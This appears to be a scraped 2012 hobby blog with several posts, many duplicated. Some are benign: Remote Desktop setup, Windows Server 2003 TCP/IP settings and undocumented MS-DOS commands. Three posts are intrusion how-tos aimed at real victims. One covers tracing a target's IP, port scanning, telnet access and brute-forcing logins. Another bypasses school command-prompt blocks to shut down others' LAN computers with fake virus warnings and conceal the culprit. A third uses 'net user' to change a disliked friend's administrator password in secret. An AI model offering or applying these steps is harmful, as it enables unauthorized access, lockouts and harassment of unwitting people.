Saturday, 6 October 2012
How To Remote Computer Using IP address
Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
Confirm the website or a computer you want to hack.
Find or trace their IP address.
Make sure that IP address is online
Scan for open ports
Check for venerable ports
access through the port
Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
a How to hack remote computer using IP Address
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
You might find this article helpful
How to get the IP address using MSN/Yahoo/Pidgin messenger
Now you got the IP address right? Is it online?
To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
c How to hack remote computer using IP Address
You’ll be asked to input login information.
d How to hack remote computer using IP Address
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP address
Related news:
Changing your IP Adress
Search the profile/people using their Email Address
Get the larger image from Gravatar image icon
How to get the IP address using MSN/Yahoo/Pidgin messenger
Hacking and crashing website using IP
Remote Desktop in Mac OS
Using Remote Desktop, you can access a computer from a remote location. To connect to a Windows computer from another Windows computer, see In Windows, how do I use Remote Desktop to access my remote computer? To connect to a Windows computer from a remote computer running Mac OS X, see below.
To enable Remote Desktop, you must have administrative rights on the computer you want to use as the host (e.g., the computer to which you will connect from a remote location), which must be running one of the following versions of Windows:
Windows 7 Professional, Enterprise, or Ultimate
Windows Vista Business, Enterprise, or Ultimate
Windows XP Professional
Before making a remote connection, first enable the Remote Desktop feature on your host computer, and then install Remote Desktop Connection client software on your client computer.
Enabling Remote Desktop
To enable the Remote Desktop feature on your host (Windows) computer:
From the Start menu, select Control Panel (or Settings, and then Control Panel). Double-click System.
In Windows 7 and Vista, click Remote settings. In the "Remote Desktop" section, select one of the two options to allow connections from other computers.
In Windows XP, select the Remote tab. Select Allow users to connect remotely to this computer.
To choose which users will have remote access, in 7 and Vista, click Select Users... , or in XP, click Select Remote Users... . Typically, all administrators of the computer will have access by default. Each user must have a password before you can allow remote access.
When you are finished, click OK. Your computer will now be able to accept incoming Remote Desktop connections.
Installing Remote Desktop Connection client software
You can download the Remote Desktop Connection (RDC) client for Mac OS X from Microsoft Mactopia.
Opening a connection
Depending upon your network configuration and system requirements, you may first have to establish a VPN connection to your host computer's network.
At Indiana University:
You must first establish a VPN connection if:
You are off campus, connecting to a computer on campus.
You are on campus, connecting to your home computer in campus or Greek housing.
See The basics of VPN at IU.
Alternatively, from your web browser, you can use the Remote Desktop application in IUanyWare, located in the "Utilities" section.
See How do I set up and use IUanyWare?
For more about remote desktop connections on the IU network, see About the block on off-campus remote desktop connections at IU.
Launch Remote Desktop Connection.
In the Remote Desktop Connection window, in the "Computer:" field, type the DNS name or IP address of the destination host.
Click Connect.
In the window that appears, enter your username, passphrase, and domain.
Click OK to start your session. When you log out of your Windows session, the RDC application will close.
To enable Remote Desktop, you must have administrative rights on the computer you want to use as the host (e.g., the computer to which you will connect from a remote location), which must be running one of the following versions of Windows:
Windows 7 Professional, Enterprise, or Ultimate
Windows Vista Business, Enterprise, or Ultimate
Windows XP Professional
Before making a remote connection, first enable the Remote Desktop feature on your host computer, and then install Remote Desktop Connection client software on your client computer.
Enabling Remote Desktop
To enable the Remote Desktop feature on your host (Windows) computer:
From the Start menu, select Control Panel (or Settings, and then Control Panel). Double-click System.
In Windows 7 and Vista, click Remote settings. In the "Remote Desktop" section, select one of the two options to allow connections from other computers.
In Windows XP, select the Remote tab. Select Allow users to connect remotely to this computer.
To choose which users will have remote access, in 7 and Vista, click Select Users... , or in XP, click Select Remote Users... . Typically, all administrators of the computer will have access by default. Each user must have a password before you can allow remote access.
When you are finished, click OK. Your computer will now be able to accept incoming Remote Desktop connections.
Installing Remote Desktop Connection client software
You can download the Remote Desktop Connection (RDC) client for Mac OS X from Microsoft Mactopia.
Opening a connection
Depending upon your network configuration and system requirements, you may first have to establish a VPN connection to your host computer's network.
At Indiana University:
You must first establish a VPN connection if:
You are off campus, connecting to a computer on campus.
You are on campus, connecting to your home computer in campus or Greek housing.
See The basics of VPN at IU.
Alternatively, from your web browser, you can use the Remote Desktop application in IUanyWare, located in the "Utilities" section.
See How do I set up and use IUanyWare?
For more about remote desktop connections on the IU network, see About the block on off-campus remote desktop connections at IU.
Launch Remote Desktop Connection.
In the Remote Desktop Connection window, in the "Computer:" field, type the DNS name or IP address of the destination host.
Click Connect.
In the window that appears, enter your username, passphrase, and domain.
Click OK to start your session. When you log out of your Windows session, the RDC application will close.
Friday, 5 October 2012
Windows Server 2003 IP setting
In this article I will walk you through the Advanced TCP/IP settings
dialog and its relevant tabs, so that you can better understand what
each option is used for and how to configure it.
Windows 2003 comes with a number of new features for TCP/IP, including support for IP Version 6, automatically determining the Interface and Gateway metric, and the Alternate configuration tab which allows you to specify an alternate IP Address to use in absence of a DHCP server (before APIPA kicks in).
The Advanced TCP/IP dialog will allow you to configure settings relative to DNS, WINS and specify multiple IP Addresses and Gateways (which can even be used if you only have one network card on the machine).
To bring up the Advanced TCP/IP Settings dialog, simply right click the desired connection from the Network Connections folder, and choose properties to open the Properties dialog of the selected connection. Now select Internet Protocol (TCP/IP) from the list and click the Properties button. This will open the Internet Protocol (TCP/IP) Properties dialog. Next, click the Advanced button and up pops the Advanced TCP/IP Settings dialog with four tabs to choose from:
IP Settings – Allows you to add more IP Addresses or change the routing properties of the network card.
DNS – Allows you to set how the TCP/IP connection uses DNS.
WINS – Allows you to set how the TCP/IP connection uses WINS for computers that can’t access Active Directory.
Options – Allows you to set TCP/IP Filtering and specify which ports will be used for TCP/IP communication.
Simply click the Add button to add an IP Address and Subnet Mask. Click Edit to modify the currently selected item and Remove to delete the currently selected item from the list.
Figure 1: The IP Settings Tab
The Default gateways box in the middle is used if you want the network connection to use multiple default gateways. Click the Add button to add a Default gateway and assign it a Metric value. A metric value is the cost of a specific route. Cost can reflect speed, reliability and number of hops. The route with the lowest metric value is used, so if you have two Default Gateways set up, one with a metric of 10 and the other with a metric of 20, the one with 10 will be chosen first. Leaving the metric at automatic means that the route metric for this default gateway will be calculated automatically, and the fastest route chosen.
Note: If you fire up the Command Prompt and type “route print” with no quotes, the IP Routing table is displayed with the metric value listed as one of the properties of each IP Address and its associations.
The Edit and Remove buttons in the Default gateways box do exactly the same as for the IP addresses box (explained above).
At the bottom of the IP Settings tab you can set whether you want the Interface to have a specific metric or to be assigned one automatically. By default this option is checked. Uncheck it if you wish to input an Interface metric value of your choice.
It is important to keep in mind that TCP/IP will not move on to the next server if it fails to resolve the request. It will only move to the next server if the first server it tries is unavailable (perhaps down for maintenance or in the middle of a reboot).
Append primary and connection specific DNS suffixes, and Append parent suffixes of the primary DNS suffix are enabled by default. These options are used for resolution of unqualified names.
The first option is used to resolve unqualified names using the parent domain. For example, if you had a computer name of “andrew” and a parent domain called ztabona.com it would resolve to andrew.ztabona.com. The query would fail if andrew.ztabona.com does not exist in the parent domain. The second option is used to resolve unqualified names using the parent-child domain hierarchy. A DNS query will move one step up the domain hierarchy if it fails at the current level. It will do this until it reaches the root of the hierarchy.
If you have an environment which consists of a client machine forming part of multiple domains then you can add a bunch of domains to the Append these DNS suffixes (in order) list so these will be searched as part of the DNS query, instead of using the parent domain.
Figure 2
The textbox on the right of the DNS suffix for this connection is used to explicitly set a DNS suffix that will override any other setting already specified for this connection.
Register this connection’s addresses in DNS will register all this connection’s IP Addresses in DNS under the computer’s FQDN. Using this connection’s DNS suffix in DNS registration will register all IP Addresses for this connection in DNS under the parent domain.
Pre-Windows 2000 machines and applications use NETBIOS to IP name resolution. If you have a Windows 2003 machine that acts as a file or print server and any client machines want to communicate with it, you will have to make use of NETBIOS. It is unlikely that you will have no pre-Windows 2000 machines on your network but if you do, then go ahead and disable NETBIOS over IP; you’ll save on memory and CPU consumption and free up resources.
Use the "WINS addresses, in order of use box" at the top to add the WINS servers you want the system to use for IP to name resolution. Press the Add button for a small dialog box to appear waiting for you to enter the IP Address of the WINS server. Use the Edit and Remove buttons to modify or delete a selected item respectively. If you have more than one WINS server in the list, press the up and down arrow buttons to adjust the priority of which servers will be queried first. If one server is not available then the next one down will be used, and so on and so forth.
Figure 3
Check the Enable LMHOSTS lookup checkbox so that if WINS cannot resolve a name then the local LMHOSTS file will be used. The LMHOSTS file can be found in \WINDOWS\system32\drivers\etc. It goes by the name of lmhosts.sam and can be modified in a text editor. Entries are placed at the bottom of the file and when used, the listed IP Addresses are matched against a specified host name. If you already have an LMHOSTS file defined on another machine on the network, use the Import LMHOSTS button to select this file and import it to the local machine.
The NETBIOS settings at the bottom allow you to explicitly define how NETBIOS will be used on the system. Choose Default if you want the DHCP server to assign the NETBIOS setting, Enable NETBIOS over TCP/IP if you use a static IP Address or the DHCP Server does not give NETBIOS settings, and Disable NETBIOS over TCP/IP if you do not use NETBIOS or WINS on your network.
Windows 2003 comes with a number of new features for TCP/IP, including support for IP Version 6, automatically determining the Interface and Gateway metric, and the Alternate configuration tab which allows you to specify an alternate IP Address to use in absence of a DHCP server (before APIPA kicks in).
The Advanced TCP/IP dialog will allow you to configure settings relative to DNS, WINS and specify multiple IP Addresses and Gateways (which can even be used if you only have one network card on the machine).
To bring up the Advanced TCP/IP Settings dialog, simply right click the desired connection from the Network Connections folder, and choose properties to open the Properties dialog of the selected connection. Now select Internet Protocol (TCP/IP) from the list and click the Properties button. This will open the Internet Protocol (TCP/IP) Properties dialog. Next, click the Advanced button and up pops the Advanced TCP/IP Settings dialog with four tabs to choose from:
IP Settings – Allows you to add more IP Addresses or change the routing properties of the network card.
DNS – Allows you to set how the TCP/IP connection uses DNS.
WINS – Allows you to set how the TCP/IP connection uses WINS for computers that can’t access Active Directory.
Options – Allows you to set TCP/IP Filtering and specify which ports will be used for TCP/IP communication.
Advanced TCP/IP Settings – The IP Settings Tab
The IP addresses box at the top allows you to assign additional IP Addresses to a single network card. This is useful if you are hosting multiple websites on the same web server and want to give each its own IP Address for example.Simply click the Add button to add an IP Address and Subnet Mask. Click Edit to modify the currently selected item and Remove to delete the currently selected item from the list.
Figure 1: The IP Settings Tab
The Default gateways box in the middle is used if you want the network connection to use multiple default gateways. Click the Add button to add a Default gateway and assign it a Metric value. A metric value is the cost of a specific route. Cost can reflect speed, reliability and number of hops. The route with the lowest metric value is used, so if you have two Default Gateways set up, one with a metric of 10 and the other with a metric of 20, the one with 10 will be chosen first. Leaving the metric at automatic means that the route metric for this default gateway will be calculated automatically, and the fastest route chosen.
Note: If you fire up the Command Prompt and type “route print” with no quotes, the IP Routing table is displayed with the metric value listed as one of the properties of each IP Address and its associations.
The Edit and Remove buttons in the Default gateways box do exactly the same as for the IP addresses box (explained above).
At the bottom of the IP Settings tab you can set whether you want the Interface to have a specific metric or to be assigned one automatically. By default this option is checked. Uncheck it if you wish to input an Interface metric value of your choice.
Advanced TCP/IP Settings – The DNS Tab
The "DNS server addresses, in order of use box" at the top of the DNS tab is used to list the IP Addresses of the DNS Servers that will be used for name resolution. These servers are ordered and used in priority, meaning if one server does not work then it will move to the next one down the list. To set the order of IP Addresses, select an IP Address and press the up and down button on the right hand side.It is important to keep in mind that TCP/IP will not move on to the next server if it fails to resolve the request. It will only move to the next server if the first server it tries is unavailable (perhaps down for maintenance or in the middle of a reboot).
Append primary and connection specific DNS suffixes, and Append parent suffixes of the primary DNS suffix are enabled by default. These options are used for resolution of unqualified names.
The first option is used to resolve unqualified names using the parent domain. For example, if you had a computer name of “andrew” and a parent domain called ztabona.com it would resolve to andrew.ztabona.com. The query would fail if andrew.ztabona.com does not exist in the parent domain. The second option is used to resolve unqualified names using the parent-child domain hierarchy. A DNS query will move one step up the domain hierarchy if it fails at the current level. It will do this until it reaches the root of the hierarchy.
If you have an environment which consists of a client machine forming part of multiple domains then you can add a bunch of domains to the Append these DNS suffixes (in order) list so these will be searched as part of the DNS query, instead of using the parent domain.
Figure 2
The textbox on the right of the DNS suffix for this connection is used to explicitly set a DNS suffix that will override any other setting already specified for this connection.
Register this connection’s addresses in DNS will register all this connection’s IP Addresses in DNS under the computer’s FQDN. Using this connection’s DNS suffix in DNS registration will register all IP Addresses for this connection in DNS under the parent domain.
Advanced TCP/IP Settings – The WINS Tab
The WINS tab is used to specify WINS related settings such as the list of WINS servers to be used for NETBIOS name to IP resolution, the LMHOSTS file to be used as an alternate means of lookups and the NETBIOS settings for the network connection.Pre-Windows 2000 machines and applications use NETBIOS to IP name resolution. If you have a Windows 2003 machine that acts as a file or print server and any client machines want to communicate with it, you will have to make use of NETBIOS. It is unlikely that you will have no pre-Windows 2000 machines on your network but if you do, then go ahead and disable NETBIOS over IP; you’ll save on memory and CPU consumption and free up resources.
Use the "WINS addresses, in order of use box" at the top to add the WINS servers you want the system to use for IP to name resolution. Press the Add button for a small dialog box to appear waiting for you to enter the IP Address of the WINS server. Use the Edit and Remove buttons to modify or delete a selected item respectively. If you have more than one WINS server in the list, press the up and down arrow buttons to adjust the priority of which servers will be queried first. If one server is not available then the next one down will be used, and so on and so forth.
Figure 3
Check the Enable LMHOSTS lookup checkbox so that if WINS cannot resolve a name then the local LMHOSTS file will be used. The LMHOSTS file can be found in \WINDOWS\system32\drivers\etc. It goes by the name of lmhosts.sam and can be modified in a text editor. Entries are placed at the bottom of the file and when used, the listed IP Addresses are matched against a specified host name. If you already have an LMHOSTS file defined on another machine on the network, use the Import LMHOSTS button to select this file and import it to the local machine.
The NETBIOS settings at the bottom allow you to explicitly define how NETBIOS will be used on the system. Choose Default if you want the DHCP server to assign the NETBIOS setting, Enable NETBIOS over TCP/IP if you use a static IP Address or the DHCP Server does not give NETBIOS settings, and Disable NETBIOS over TCP/IP if you do not use NETBIOS or WINS on your network.
Advanced TCP/IP Settings – The Options Tab (TCP/IP Filtering)
The Options tab allows you to configure TCP/IP Filtering settings; you can define which ports or protocols are permitted. Select the Permit Only radio button and use the Add button to add TCP/UDP port numbers or a protocol version to the respective list. If you permit traffic only from a defined set of ports, all other traffic will be dropped.
Tutorial Adobe Photoshop CS for Newbie
Hy guys :)
This morning I will give a tutorial about Adobe Photoshop CS, this tutorial is in PDF format, with size 10 MB.
you can download in link below
Download Link Tutorial Adobe Cs
If you want more about Tutorial Adobe Cs you can see in download tabs or you can contact me.
all of that is free..
see you guys :)
"Have a Nice Day"
This morning I will give a tutorial about Adobe Photoshop CS, this tutorial is in PDF format, with size 10 MB.
you can download in link below
Download Link Tutorial Adobe Cs
If you want more about Tutorial Adobe Cs you can see in download tabs or you can contact me.
all of that is free..
see you guys :)
"Have a Nice Day"
Thursday, 4 October 2012
Make You Own Social Media with SocialEngine
Now we can make own social media like Facebook
it simple, just download and install
check it out, and be the first just click
SocialEngine
be the firts friend
it simple, just download and install
check it out, and be the first just click
SocialEngine
be the firts friend
How to Shutdown Another Computer in LAN Area
1. Go to Notepad.
2. Type in command.com and save as cmd.bat. A lot of schools block CMD on computers, and this is how to override that.
3. Open it up and it should go to CMD.
4. Type in 'shutdown -i' and press 'Enter'.
5. You will come to this white box with options....wow, that was a vague description. You'll know it when you see it. What you do now is add the name of the computer that you want to shut down, if necessary.
6. You can choose whether to warn users or not that their computer is about to shut down. Personally, I prefer to warn users and as the comment, I like to put something like "WARNING, SECURITY BREACH IN SYSTEM" or "WARNING, VIRUS DETECTED. HARD DRIVE BEING WIPED".
7. Press okay and then shut down your computer as quickly as possible to avoid people knowing it was you.
8. Watch people freak out when their computer shuts down unexpectedly.
This is a really fun trick and I have done this to my brother at home while he was playing minecraft. He was REALLY angry when he found out it was me.
2. Type in command.com and save as cmd.bat. A lot of schools block CMD on computers, and this is how to override that.
3. Open it up and it should go to CMD.
4. Type in 'shutdown -i' and press 'Enter'.
5. You will come to this white box with options....wow, that was a vague description. You'll know it when you see it. What you do now is add the name of the computer that you want to shut down, if necessary.
6. You can choose whether to warn users or not that their computer is about to shut down. Personally, I prefer to warn users and as the comment, I like to put something like "WARNING, SECURITY BREACH IN SYSTEM" or "WARNING, VIRUS DETECTED. HARD DRIVE BEING WIPED".
7. Press okay and then shut down your computer as quickly as possible to avoid people knowing it was you.
8. Watch people freak out when their computer shuts down unexpectedly.
This is a really fun trick and I have done this to my brother at home while he was playing minecraft. He was REALLY angry when he found out it was me.
Hack by Changing administrator Password
Okay, today, let's have some fun with Google. Also, today, I will show you how to hack anyone's computer by changing their administrator password. It's all completely reversible, so it is a Trick AND a hack today.
Let's begin with having some fun with Google. How about we start with a very minor trick that you all will probably all know. If you do not have Google, then skip over to the hack.
1. Open up Google.
2. Type : google l33t into google search bar and press I'm Feeling Lucky.
Type : google loco into google search bar and press I'm Feeling Lucky.
Type : google gothic into google search bar and press I'm Feeling Lucky.
Type : ewmew fudd into google search bar and press I'm Feeling Lucky.
Type : xx-klingon into google search bar and press I'm Feeling Lucky.
Type : xx-piglatin into google search bar and press I'm Feeling Lucky.
Type : google bsd into google search bar and press I'm Feeling Lucky.
Type : google linux into google search bar and press I'm Feeling Lucky.
Type : answer to life, the universe, and everything into google and press search.
Wasn't that fun? Okay, let's do some graffiti with Google now.
3. Open up Google again.
4. Open up www.netdisaster.com and type in your target website.
5. Have some fun.
Okay, let's do the hack. Do you have a buddy that you secretly hate? Come on. We all do. So, next time you're over at their house, go to their computer while they're in the washroom or cooking or playing a sport.
Just as a tip, if your friends know that you hack as a hobby, don't do this, because they will suspect you're at fault in a second.
Let's get started.
1. Open up notepad and type in command.com
2. Save it as 'cmd.bat'
3. Open it up. You should come to a black screen.
4. Type in net user.
5. Then find the name of the administrator.
6. Once you have the name, type in 'net user [administrator name]*'
7. Type in the password that you choose.
Yes, your buddy may be pissed off, but it is completely reversible! Do the same process and just type in the password that your buddy chooses.
Let's begin with having some fun with Google. How about we start with a very minor trick that you all will probably all know. If you do not have Google, then skip over to the hack.
1. Open up Google.
2. Type : google l33t into google search bar and press I'm Feeling Lucky.
Type : google loco into google search bar and press I'm Feeling Lucky.
Type : google gothic into google search bar and press I'm Feeling Lucky.
Type : ewmew fudd into google search bar and press I'm Feeling Lucky.
Type : xx-klingon into google search bar and press I'm Feeling Lucky.
Type : xx-piglatin into google search bar and press I'm Feeling Lucky.
Type : google bsd into google search bar and press I'm Feeling Lucky.
Type : google linux into google search bar and press I'm Feeling Lucky.
Type : answer to life, the universe, and everything into google and press search.
Wasn't that fun? Okay, let's do some graffiti with Google now.
3. Open up Google again.
4. Open up www.netdisaster.com and type in your target website.
5. Have some fun.
Okay, let's do the hack. Do you have a buddy that you secretly hate? Come on. We all do. So, next time you're over at their house, go to their computer while they're in the washroom or cooking or playing a sport.
Just as a tip, if your friends know that you hack as a hobby, don't do this, because they will suspect you're at fault in a second.
Let's get started.
1. Open up notepad and type in command.com
2. Save it as 'cmd.bat'
3. Open it up. You should come to a black screen.
4. Type in net user.
5. Then find the name of the administrator.
6. Once you have the name, type in 'net user [administrator name]*'
7. Type in the password that you choose.
Yes, your buddy may be pissed off, but it is completely reversible! Do the same process and just type in the password that your buddy chooses.
Various MS DOS
Contents:
- TRUENAME
- FDISK /STATUS
- FDISK /MBR
- SHELL=C:\COMMAND.COM /P /F
- COMMAND /F
- COMMAND /P
- COMMAND /D
- VER /R
- ECHO OFF and ECHO ON
- FORMAT /AUTOTEST
- FORMAT /BACKUP
- FORMAT /SELECT
- FORMAT /SELECT /U
- FORMAT /H
- IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
- Using ATTRIB to hide directories
- SWITCHES=/W
- FOR %%V IN (/SOMETHING)
- DIR,
- COPY. A:
- DOS?=HIGH
- INSTALLHIGH
- Using : for batch file comments
- REM in lines with pipes or redirection
- Delimiter character
===========================================================================
TRUENAME
--------
Internal DOS 5.0 command. Canonicalize a filename or path (using DOS interrupt 21h, function 60) prints the actual directory.
Syntax:
TRUENAME filename - Prints the complete path to file.
TRUENAME directory - Prints the complete path to directory.
Note: If the path is in a network, it starts with a \\machine-name.
TRUENAME is analogous to the UNIX "whence" command. It returns the real fully-qualified path name for a command.
TRUENAME is useful in networks, where a physical drive may be mapped to a logical volume, and the user needs to know the physical location of the file. It ignores the DOS SUBST and JOIN commands, or network MAPped drives.
TRUENAME is an undocumented MS-DOS feature, but it is documented in JP Software's 4DOS software (COMMAND.COM replacement) as follows:
Syntax:
TRUENAME [d:][path]filename
Purpose:
Returns a fully qualified filename.
Comments:
TRUENAME will see "through" JOIN and SUBST commands, and
requires MS-DOS 3.0 or above.
Example:
The following command uses TRUENAME to get the true pathname
for a file:
c:\>subst d: c:\util\test
c:\>truename d:\test.exe
c:\util\test\test.exe
TRUENAME : will reveal the full name drive and path of the filename. If you specify a wildcard (*) in the filename, it will expand the filename to use question marks instead. If the path includes the ..\ sequence, TRUENAME will examine the directory structure and calculate the path.
Stranger still, the line:
TRUENAME \CRONK\FLIBBET\..\ART
...produces the response:
C:\CRONK\ART
...even if the directories \CRONK\FLIBBET and the file ART don't exist! Don't expect this command to work well across networks. After all, this is still undocumented in MS-DOS for a reason!
===========================================================================
FDISK /STATUS
-------------
Prints a screen just like using option 4 of FDISK, "Partition information", but includes extended partition information. Nice if you want to get an overview without fear of pressing the wrong keys.
Doesn't work in DOS 3.30.
===========================================================================
FDISK /MBR
----------
MS-DOS 5.0 FDISK has an undocumented parameter, /MBR, that causes it to write the master boot record to the hard disk without altering the partition table information. While this feature is not documented, it can be told to customers on a need-to-know basis.
Warning: Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable. It can also cause problems for some dual-boot programs, or for disks with more than 4 partitions. Specific information is below.
What is the MBR?
At the end of the ROM BIOS bootstrap routine, the BIOS will read and execute the first physical sector of the first floppy or hard drive on the system. This first sector of the hard disk is called the master boot record, or sometimes the partition table or master boot block. At the beginning of this sector of the hard disk is a small program. At the end of this sector is where the partition information, or partition table, is stored. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it.
This program is what is written to the disk by FDISK /MBR and is usually called the master boot record. During normal operation, FDISK only writes this program to the disk if there is no master boot record.
Why is the MBR changed during Setup?
During installation of Microsoft MS-DOS 5 Upgrade, Setup will replace the master boot record on the hard disk with code to display the message:
The MS-DOS 5.0 Setup was not completed.
Insert the UNINSTALL #1 diskette in drive A.
Press the ENTER key to continue.
This message should be erased and the master boot code rewritten before Setup is completed. If a problem occurs during Setup and you return to the previous MS-DOS, UNINSTAL should also remove this message. However, should Setup or UNINSTAL fail to remove this message, or should the master boot record become corrupted, a new master boot record can be written to the disk using the following command:
C:\>fdisk /mbr
WARNINGS:
This option should not be used if:
- the disk was partitioned using Storage Dimensions'
SpeedStor utility with its /Bootall option
- more than 4 partitions exist
- certain dual-boot programs are in use
Storage Dimensions' SpeedStor utility using the /Bootall option redefines the drive's physical parameters (cylinder, head, sector). /BOOTALL stores information on how the drive has been changed in an area of the master boot record that MS-DOS does not use. FDISK /MBR will erase that information, making the disk unusable.
Some older OEM versions of MS-DOS and some third-party partitioning utilities can create more than 4 partitions. Additional partition information is commonly stored information on partitions in an area that FDISK /MBR will overwrite.
Some dual-boot programs have a special MBR that asks the user which operating system they want on bootup. FDISK /MBR erases this program. Dual-boot systems that boot whichever partition is marked Active are not affected by FDISK /MBR.
If you have a Boot Sector Virus, just boot from a known "clean" floppy disk that's write protected and which has FDISK on it, and run FDISK /MBR.
===========================================================================
SHELL=C:\COMMAND.COM /P /F
--------------------------
The /F in the CONFIG.SYS SHELL= statement forces a "Fail" response to all "Abort, Retry, Fail" prompts issued by the DOS critical error handler.
===========================================================================
COMMAND /F
----------
Entered on the command line, COMMAND /F makes all those annoying "Abort, Retry, Ignore, Fail" disk error messages default to "Fail" from then on until rebooting.
===========================================================================
COMMAND /P
----------
For DOS 3.30 (not checked with other versions): Docs say that this doesn't allow you to exit back to the previous shell, but /P also forces AUTOEXEC.BAT to be run on secondary shells.
===========================================================================
COMMAND /D
----------
When used with a primary shell, or secondary with /P, prevents execution of AUTOEXEC.BAT.
===========================================================================
VER /R
------
Yields extended information about the DOS version:
MS-DOS Version 5.00
Revision A
DOS is in HMA
Doesn't work with DOS 3.30. VER /R is a documented feature of JP Software's 4DOS.
===========================================================================
ECHO OFF and ECHO ON
--------------------
Entering ECHO OFF from the command line erases the prompt and leaves just a cursor on the screen. ECHO ON from the command line restores the prompt. This works with all version of DOS.
One of the most frequently asked questions is "How do I ECHO a blank line in a batch file?" The most common answer is to use ECHO directly followed by a period: ECHO. like so. However, just about any "white space" character will work, as well as any "delimiter". The following alternatives can be used: ECHO. ECHO" ECHO, ECHO: ECHO; ECHO[ ECHO] etc. Apparently it's just the way that the command handles the delimiter and has been available from way back! Microsoft just began mentioning it in the documentation recently, though, and their examples use a period.
===========================================================================
FORMAT /AUTOTEST
----------------
The autotest parameter will allow FORMAT to proceed, checking the existing format of the disk (unless the /U parameter with DOS 5 or 6 is also present), and proceeding with the format.
All this will take place with no delay and no waiting for user input. It will also end without pausing. It will not ask for a volume label or whether to format another diskette.
WARNING! This procedure will also work on hard drives! Be very cautious if you plan to use this feature!
===========================================================================
FORMAT /BACKUP
--------------
This works exactly like /AUTOTEST, but it does ask for a volume label.
===========================================================================
FORMAT /SELECT
--------------
This is like the DOS MIRROR command... For safety-fanatics only.
===========================================================================
FORMAT /SELECT /U
-----------------
Just makes a disk unreadable. Guess it could be handy?
===========================================================================
FORMAT /H
---------
In DOS 3.30 (not tested with other versions), FORMAT /H will cause the format to begin immediately after pressing Y in response to "Format another", rather than displaying "Place disk to be formatted in drive x: and press Enter" on a second and subsequent disks.
In DOS 5.0, FORMAT reports "invalid switch".
===========================================================================
IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
----------------------------------------------------------------
This is a handy quirk of DOS. Installable drivers are seen as files in all directories. You can use the if exist test to either test for the existence of a directory, with "if exist <dirname>\nul", which fails if the directory does not exist because the nul device is not found; or to test whether any driver is loaded, such as the DOS 5 or 6 EMM386 memory manager.
Caveats: For testing NUL, you need to know the name of the directory or the driver whose existence you are testing, and this is MS-DOS specific -- it doesn't work on network drives, and may not work under DR-DOS.
Where did you learn the "EMMXXXX0" name from? Instead of typing MEM /C, type MEM /D for the "debug" listing.
The only trouble is EXISTS returns true for COM3/4 and LPT2/3 even if the hardware does not exist.
===========================================================================
Using ATTRIB to hide directories
--------------------------------
The DOS 5.0 and 6.0 ATTRIB command can do the same thing for directories as it can for files: ATTRIB +H <dirname> will hide the named directory.
===========================================================================
SWITCHES=/W
-----------
Enables you to have the Windows 3.0 WINA20.386 file anywhere on your boot drive. Without this you have to have it in the root directory.
This should not be used with Windows 3.1, since it appears to waste around 120K of UMBs.
===========================================================================
FOR %%V IN (/SOMETHING)
-----------------------
How can a batch file (without 4DOS) determine from which drive it has been started?
Example: C:\>a:test.bat
Now my batch should be able to find out that it is located on drive A: (not the path, only the drive!).
In a batch file, the variable %0 contains the name of the batch file as it was typed at the command line. If you run the batch file as A:TEST.BAT, %0 will be "A:TEST.BAT". If you have the directory on your path, and simply type TEST, then %0 will be "TEST". The drive, path, and extension will only appear in %0 if you enter them in the command used to call the batch file (either typed at the command line, or called from another batch file). So, you must specify the drive as part of the batch filename for this to work.
To extract the drive only from %0, use the undocumented FOR %%V in /SOMETHING command:
set drive=
for %%v in (/%0) do call test2 %%v
echo Calling drive is %drive%
...where TEST2.BAT is:
if not '%drive%'=='' set drive=%1:
FOR %%V IN (/SOMETHING) DO WHATEVER will do WHATEVER twice -- the first time with %%V set to the first character in SOMETHING ("S"), the second time with all the remaining characters in SOMETHING ("OMETHING"). If SOMETHING is only a single character, WHATEVER will only be called once, with that character in %%V. If the single character is a wildcard (? or *) that wild card will not be expanded to a set of filenames. (The main purpose of this feature is apparently to allow inclusion of the literal characters "?" and "*" without them being expanded.)
This works in DOS 3.30 and later.
===========================================================================
DIR,
----
Using a comma immediately after DIR shows ALL files, including the HIDDEN ones.
This appears only to work with DOS 5.0 and 6.0. With 3.30, it doesn't display either IO.SYS, MSDOS.SYS (both with S, H and R attribs) or a test file with A and H attribs.
With DOS 5.0, it displayed a test file with H and A, but would not display IO.SYS or MSDOS.SYS with S, H and R. This isn't surprising actually, since S alone (without H) will prevent inclusion of a file in a normal DIR.
Not tested with DOS 4.x. Not supported by JP Software's 4DOS.
===========================================================================
COPY. A:
--------
The use of a period IMMEDIATELY after some DOS statements will work just like *.*
Examples: DEL. (erase all files in current directory)
COPY. A: (copy all files in current directory to A:)
There may be more statements with which it works.
This is actually a documented although obscure feature, though the ability to use the period with COPY is not documented. What is documented is the fact that "." and ".." can be used to represent the current and parent directories respectively, and these will work with many applications which can handle directory names as arguments. In this case the "." could also be viewed as a replacement for "*.*"
===========================================================================
DOS?=HIGH
---------
